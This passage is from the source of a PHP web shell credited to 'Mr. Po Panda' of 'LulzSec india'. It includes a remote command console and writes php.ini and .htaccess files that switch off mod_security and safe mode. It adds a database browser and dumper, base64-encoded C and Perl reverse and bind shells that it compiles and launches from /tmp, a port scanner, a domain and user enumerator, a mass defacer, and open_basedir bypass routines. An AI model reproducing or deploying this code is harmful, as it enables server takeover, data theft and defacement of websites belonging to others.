  2183. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
  2184. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  2185. if(@chdir($match[1])) {
  2186. $GLOBALS['cwd'] = @getcwd();
  2187. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  2188. }
  2189. }
  2190. echo "document.cf.output.value+='".$temp."';";
  2191. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  2192. $temp = ob_get_clean();
  2193. echo strlen($temp), "\n", $temp;
  2194. exit;
  2195. }
  2196. printHeader();
  2197. echo '<script>
  2198. if(window.Event) window.captureEvents(Event.KEYDOWN);
  2199. var cmds = new Array("");
  2200. var cur = 0;
  2201. function kp(e) {
  2202. var n = (window.Event) ? e.which : e.keyCode;
  2203. if(n == 38) {
  2204. cur--;
  2205. if(cur>=0)
  2206. document.cf.cmd.value = cmds[cur];
  2207. else
  2208. cur++;
  2209. } else if(n == 40) {
  2210. cur++;
  2211. if(cur < cmds.length)
  2212. document.cf.cmd.value = cmds[cur];
  2213. else
  2214. cur--;
  2215. }
  2216. }
  2217. function add(cmd) {
  2218. cmds.pop();
  2219. cmds.push(cmd);
  2220. cmds.push("");
  2221. cur = cmds.length-1;
  2222. }
  2223. </script>';
  2224. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  2225. foreach($GLOBALS['aliases'] as $n => $v) {
  2226. if($v == '') {
  2227. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  2228. continue;
  2229. }
  2230. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  2231. }
  2232. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  2233. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  2234. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value="Submit"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
  2235. if(!empty($_POST['p1'])) {
  2236. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  2237. }
  2238. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;" onkeydown="kp(event);">';
  2239. echo '</form></div><script>document.cf.cmd.focus();</script>';
  2240. printFooter();
  2241. }
  2242. function actionLogout() {
  2243. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  2244. echo '<body bgcolor=#000000><center><img src="http://images.all-free-download.com/images/graphiclarge/abstract_indian_shiny_flag_black_tricolor_wave_6818267.jpg"><h1><font color="#C3C3C3"> BYE BHAI <br><h2><font size="4">SHELL BY Mr. Po Panda <p><h2> LulzSec india <br><h2><font color="#C3C3C3">HINDUSTAN<font color="#fff">ZINDABAD</h2><p><font color="BLUE" font size="4">WE ARE :<marquee width="80%"> LulzSec india </marquee></font></font></font></center></body>';
  2245. }
  2246.  
  2247. function actionBypass() {
  2248. printHeader();
  2249. echo '<h1>Safe Mode</h1>';
  2250. echo '<div class="content">';
  2251. echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  2252. echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
  2253. if(!empty($_POST['p2']) && isset($_POST['p2']))
  2254. {
  2255. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2256. fwrite($fil,'<IfModule mod_security.c>
  2257. Sec------Engine Off
  2258. Sec------ScanPOST Off
  2259. </IfModule>');
  2260. fclose($fil);
  2261. }
  2262. if(!empty($_POST['p1'])&& isset($_POST['p1']))
  2263. {
  2264. $fil=fopen($GLOBALS['cwd']."php.ini","w");
  2265. fwrite($fil,'safe_mode=OFF
  2266. disable_functions=NONE');
  2267. fclose($fil);
  2268. }
  2269. if(!empty($_POST['p3']) && isset($_POST['p3']))
  2270. {
  2271. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2272. fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  2273. AddType application/x-httpd-cgi .sh
  2274. AddHandler cgi-script .pl
  2275. AddHandler cgi-script .pl');
  2276. fclose($fil);
  2277. }
  2278. echo "<br><br /><br /></div>";
  2279. echo '</div>';
  2280. printFooter();
  2281. }
  2282.  
  2283. function actionSql() {
  2284. class DbClass {
  2285. var $type;
  2286. var $link;
  2287. var $res;
  2288. function DbClass($type) {
  2289. $this->type = $type;
  2290. }
  2291. function connect($host, $user, $pass, $dbname){
  2292. switch($this->type) {
  2293. case 'mysql':
  2294. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  2295. break;
  2296. case 'pgsql':
  2297. $host = explode(':', $host);
  2298. if(!$host[1]) $host[1]=5432;
  2299. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  2300. break;
  2301. }
  2302. return false;
  2303. }
  2304. function selectdb($db) {
  2305. switch($this->type) {
  2306. case 'mysql':
  2307. if (@mysql_select_db($db))return true;
  2308. break;
  2309. }
  2310. return false;
  2311. }
  2312. function query($str) {
  2313. switch($this->type) {
  2314. case 'mysql':
  2315. return $this->res = @mysql_query($str);
  2316. break;
  2317. case 'pgsql':
  2318. return $this->res = @pg_query($this->link,$str);
  2319. break;
  2320. }
  2321. return false;
  2322. }
  2323. function fetch() {
  2324. $res = func_num_args()?func_get_arg(0):$this->res;
  2325. switch($this->type) {
  2326. case 'mysql':
  2327. return @mysql_fetch_assoc($res);
  2328. break;
  2329. case 'pgsql':
  2330. return @pg_fetch_assoc($res);
  2331. break;
  2332. }
  2333. return false;
  2334. }
  2335. function listDbs() {
  2336. switch($this->type) {
  2337. case 'mysql':
  2338. return $this->res = @mysql_list_dbs($this->link);
  2339. break;
  2340. case 'pgsql':
  2341. return $this->res = $this->query("SELECT datname FROM pg_database");
  2342. break;
  2343. }
  2344. return false;
  2345. }
  2346. function listTables() {
  2347. switch($this->type) {
  2348. case 'mysql':
  2349. return $this->res = $this->query('SHOW TABLES');
  2350. break;
  2351. case 'pgsql':
  2352. return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
  2353. break;
  2354. }
  2355. return false;
  2356. }
  2357. function error() {
  2358. switch($this->type) {
  2359. case 'mysql':
  2360. return @mysql_error($this->link);
  2361. break;
  2362. case 'pgsql':
  2363. return @pg_last_error($this->link);
  2364. break;
  2365. }
  2366. return false;
  2367. }
  2368. function setCharset($str) {
  2369. switch($this->type) {
  2370. case 'mysql':
  2371. if(function_exists('mysql_set_charset'))
  2372. return @mysql_set_charset($str, $this->link);
  2373. else
  2374. $this->query('SET CHARSET '.$str);
  2375. break;
  2376. case 'mysql':
  2377. return @pg_set_client_encoding($this->link, $str);
  2378. break;
  2379. }
  2380. return false;
  2381. }
  2382. function dump($table) {
  2383. switch($this->type) {
  2384. case 'mysql':
  2385. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  2386. $create = mysql_fetch_array($res);
  2387. echo $create[1].";\n\n";
  2388. $this->query('SELECT * FROM `'.$table.'`');
  2389. while($item = $this->fetch()) {
  2390. $columns = array();
  2391. foreach($item as $k=>$v) {
  2392. $item[$k] = "'".@mysql_real_escape_string($v)."'";
  2393. $columns[] = "`".$k."`";
  2394. }
  2395. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  2396. }
  2397. break;
  2398. case 'pgsql':
  2399. $this->query('SELECT * FROM '.$table);
  2400. while($item = $this->fetch()) {
  2401. $columns = array();
  2402. foreach($item as $k=>$v) {
  2403. $item[$k] = "'".addslashes($v)."'";
  2404. $columns[] = $k;
  2405. }
  2406. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  2407. }
  2408. break;
  2409. }
  2410. return false;
  2411. }
  2412. };
  2413. $db = new DbClass(@$_POST['type']);
  2414. if(@$_POST['p2']=='download') {
  2415. ob_start("ob_gzhandler", 4096);
  2416. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  2417. $db->selectdb($_POST['sql_base']);
  2418. header("Content-Disposition: attachment; filename=dump.sql");
  2419. header("Content-Type: text/plain");
  2420. foreach($_POST['tbl'] as $v)
  2421. $db->dump($v);
  2422. exit;
  2423. }
  2424. printHeader();
  2425. echo '<h1>Sql browser</h1><div class=content>
  2426. <form name="sf" method="post">
  2427. <table cellpadding="2" cellspacing="0">
  2428. <tr>
  2429. <td>Type</td>
  2430. <td>Host</td>
  2431. <td>Login</td>
  2432. <td>Password</td>
  2433. <td>Database</td>
  2434. <td></td>
  2435. </tr>
  2436. <tr>
  2437. <input type=hidden name=a value=Sql>
  2438. <input type=hidden name=p1 value=\'query\'>
  2439. <input type=hidden name=p2>
  2440. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  2441. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  2442. <td>
  2443. <select name=\'type\'>
  2444. <option value="mysql" '.(@$_POST['type']=='mysql'?'selected':'').'>MySql</option>
  2445. <option value="pgsql" '.(@$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>
  2446. </select></td>
  2447. <td><input type=text name=sql_host value="'.(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])).'"></td>
  2448. <td><input type=text name=sql_login value="'.(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])).'"></td>
  2449. <td><input type=text name=sql_pass value="'.(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])).'"></td>
  2450. <td>';
  2451. $tmp = "<input type=text name=sql_base value=''>";
  2452. if(isset($_POST['sql_host'])){
  2453. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  2454. switch($_POST['charset']) {
  2455. case "Windows-1251": $db->setCharset('cp1251'); break;
  2456. case "UTF-8": $db->setCharset('utf8'); break;
  2457. case "KOI8-R": $db->setCharset('koi8r'); break;
  2458. case "KOI8-U": $db->setCharset('koi8u'); break;
  2459. case "cp866": $db->setCharset('cp866'); break;
  2460. }
  2461. $db->listDbs();
  2462. echo "<select name=sql_base><option value=''></option>";
  2463. while($item = $db->fetch()) {
  2464. list($key, $value) = each($item);
  2465. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  2466. }
  2467. echo '</select>';
  2468. }
  2469. else echo $tmp;
  2470. }else
  2471. echo $tmp;
  2472. echo '</td>
  2473. <td><input type=submit value="Submit"></td>
  2474. </tr>
  2475. </table>
  2476. <script>
  2477. function st(t,l) {
  2478. document.sf.p1.value = \'select\';
  2479. document.sf.p2.value = t;
  2480. if(l!=null)document.sf.p3.value = l;
  2481. document.sf.submit();
  2482. }
  2483. function is() {
  2484. for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
  2485. document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
  2486. }
  2487. </script>';
  2488. if(isset($db) && $db->link){
  2489. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  2490. if(!empty($_POST['sql_base'])){
  2491. $db->selectdb($_POST['sql_base']);
  2492. echo "<tr><td width=1 style='border-top:1px #56A3E9;border-right:2px #56A3E9;'><span>Tables:</span><br><br>";
  2493. $tbls_res = $db->listTables();
  2494. while($item = $db->fetch($tbls_res)) {
  2495. list($key, $value) = each($item);
  2496. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
  2497. $value = htmlspecialchars($value);
  2498. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
  2499. }
  2500. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:1px #56A3E9;'>";
  2501. if(@$_POST['p1'] == 'select') {
  2502. $_POST['p1'] = 'query';
  2503. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
  2504. $num = $db->fetch();
  2505. $num = $num['n'];
  2506. echo "<span>".$_POST['p2']."</span> ($num) ";
  2507. for($i=0;$i<($num/30);$i++)
  2508. if($i != (int)$_POST['p3'])
  2509. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
  2510. else
  2511. echo ($i+1)," ";
  2512. if($_POST['type']=='pgsql')
  2513. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  2514. else
  2515. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  2516. echo "<br><br>";
  2517. }
  2518. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
  2519. $db->query(@$_POST['p3']);
  2520. if($db->res !== false) {
  2521. $title = false;
  2522. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
  2523. $line = 1;
  2524. while($item = $db->fetch()) {
  2525. if(!$title) {
  2526. echo '<tr>';
  2527. foreach($item as $key => $value)
  2528. echo '<th>'.$key.'</th>';
  2529. reset($item);
  2530. $title=true;
  2531. echo '</tr><tr>';
  2532. $line = 2;
  2533. }
  2534. echo '<tr class="l'.$line.'">';
  2535. $line = $line==1?2:1;
  2536. foreach($item as $key => $value) {
  2537. if($value == null)
  2538. echo '<td><i>null</i></td>';
  2539. else
  2540. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  2541. }
  2542. echo '</tr>';
  2543. }
  2544. echo '</table>';
  2545. } else {
  2546. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  2547. }
  2548. }
  2549. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
  2550. echo "</td></tr>";
  2551. }
  2552. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='Submit'></form>";
  2553. if(@$_POST['p1'] == 'loadfile') {
  2554. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
  2555. $file = $db->fetch();
  2556. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  2557. }
  2558. }
  2559. echo '</div>';
  2560. printFooter();
  2561. }
  2562. function actionNetwork() {
  2563. printHeader();
  2564. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  2565. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2566. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  2567. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2568. echo '<h1>Network tools</h1><div class=content>
  2569. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  2570. <br /><span>Bind port to /bin/sh</span><br/>
  2571. Port: <input type=\'text\' name=\'port\' value=\'444\'> Password: <input type=\'text\' name=\'pass\' value=\'BHP\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value="Submit">
  2572. </form>
  2573. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  2574. <br /><br /><span>Back-connect to</span><br/>
  2575. Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'444\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value="Submit">
  2576. </form><br>';
  2577. if(isset($_POST['p1'])) {
  2578. function cf($f,$t) {
  2579. $w=@fopen($f,"w") or @function_exists('file_put_contents');
  2580. if($w) {
  2581. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  2582. @fclose($w);
  2583. }
  2584. }
  2585. if($_POST['p1'] == 'bpc') {
  2586. cf("/tmp/bp.c",$bind_port_c);
  2587. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  2588. @unlink("/tmp/bp.c");
  2589. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  2590. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
  2591. }
  2592. if($_POST['p1'] == 'bpp') {
  2593. cf("/tmp/bp.pl",$bind_port_p);
  2594. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  2595. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
  2596. }
  2597. if($_POST['p1'] == 'bcc') {
  2598. cf("/tmp/bc.c",$back_connect_c);
  2599. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  2600. @unlink("/tmp/bc.c");
  2601. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  2602. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
  2603. }
  2604. if($_POST['p1'] == 'bcp') {
  2605. cf("/tmp/bc.pl",$back_connect_p);
  2606. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  2607. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
  2608. }
  2609. }
  2610. echo '</div>';
  2611. printFooter();
  2612. }
  2613. function actionPortScanner() {
  2614. printHeader();
  2615. echo '<h1>Port Scanner</h1>';
  2616. echo '<div class="content">';
  2617. echo '<form action="" method="post">';
  2618. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  2619. $start = strip_tags($_POST['start']);
  2620. $end = strip_tags($_POST['end']);
  2621. $host = strip_tags($_POST['host']);
  2622. for($i = $start; $i<=$end; $i++){
  2623. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  2624. if($fp){
  2625. echo 'Port '.$i.' is <font color=lime>open</font><br>';
  2626. }
  2627. flush();
  2628. }
  2629. } else {
  2630. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  2631. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  2632. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  2633. Host: <input type="text" name="host" value="localhost"/><br /><br />
  2634. Port start: <input type="text" name="start" value="0"/><br /><br />
  2635. Port end:<input type="text" name="end" value="5000"/><br /><br />
  2636. <input type="submit" value="Scan Ports" />
  2637. </form></center><br /><br />';
  2638. }
  2639. echo '</div>';
  2640. printFooter();
  2641. }
  2642. function actionDomain() {
  2643. printHeader();
  2644. echo '<center> <h1>local domain viewer</h1><div class=content></center>';
  2645. $file = @implode(@file("/etc/named.conf"));
  2646. if (!$file) {
  2647. die("# can't ReaD -> [ /etc/named.conf ]");
  2648. }
  2649. preg_match_all("#named/(.*?).db#", $file, $r);
  2650. $domains = array_unique($r[1]);
  2651. check();
  2652. if(isset($_GET['ShowAll']))
  2653. {
  2654. echo "<table align=center border=1 width=59% cellpadding=5>
  2655. <tr><td colspan=2>[+] There are : [ <b>" . count($domains) . "</b> ] Domain</td></tr>
  2656. <tr><td>Domain</td><td>User</td></tr>";
  2657. foreach ($domains as $domain) {
  2658. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  2659. echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
  2660. }
  2661. echo "</table>";
  2662. }
  2663. echo '</div>';
  2664. printFooter();
  2665. }
  2666.  
  2667. function actionDeface() {
  2668. printHeader();
  2669. echo "<h1>Simple Mass Defacer</h1><div class=content>";
  2670. ?>
  2671. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
  2672. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
  2673. <br>file name : <input type=text name=file size=20 value="index.htm">
  2674. <br>Text Content : <input type=text name=Contents size=20 value="Hacked by Mr. Po Panda ">
  2675. <br><input type=submit value="Update kar de !!!!!!"></p></form>
  2676.  
  2677. <?php
  2678. if ($_POST['a'] == 'Deface') {
  2679. $mainpath = $_POST[p1];
  2680. $file = $_POST[p2];
  2681. $txtContents = $_POST[p3];
  2682. echo "-----------------------------------------------<br>
  2683. [+] Simple Mass defacer<br>
  2684. -----------------------------------------------<br><br> ";
  2685. $dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
  2686. while ($row = readdir($dir)) {
  2687. $start = @fopen("$row/$file", "w+");
  2688. $code = $txtContents;
  2689. $finish = @fwrite($start, $code);
  2690. if ($finish) {
  2691. echo "http://$row/$file<br>";
  2692. }
  2693. }
  2694. echo "-----------------------------------------------<br><br>[+] Script by Mr. Po Panda [+]";
  2695. }
  2696. echo '</div>';
  2697. printFooter();
  2698. }
  2699.  
  2700.  
  2701. function actionDefacer() {
  2702.  
  2703. $temp='';
  2704. ob_start();
  2705. switch($_POST['p1']) {
  2706. case 1:
  2707. $temp=@tempnam($test, 'cx');
  2708. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  2709. echo @file_get_contents($temp);
  2710. unlink($temp);
  2711. } else
  2712. echo 'Sorry... Can\'t open file';
  2713. break;
  2714. case 2:
  2715. $files = glob($_POST['p2'].'*');
  2716. if( is_array($files) )
  2717. foreach ($files as $filename)
  2718. echo $filename."\n";
  2719. break;
  2720. case 3:
  2721. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  2722. curl_exec($ch);
  2723. break;
  2724. case 4:
  2725. ini_restore("safe_mode");
  2726. ini_restore("open_basedir");
  2727. include($_POST['p2']);
  2728. break;
  2729. case 5:
  2730. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  2731. $uid = @posix_getpwuid($_POST['p2']);
  2732. if ($uid)
  2733. echo join(':',$uid)."\n";
  2734. }
  2735. break;
  2736. case 6:
  2737. if(!function_exists('imap_open'))break;
  2738. $stream = imap_open($_POST['p2'], "", "");
  2739. if ($stream == FALSE)
  2740. break;
  2741. echo imap_body($stream, 1);
  2742. imap_close($stream);
  2743. break;
  2744. }
  2745. $temp = ob_get_clean();
  2746. printHeader();
  2747. echo '<h1>Safe mode bypass</h1><div class=content>';
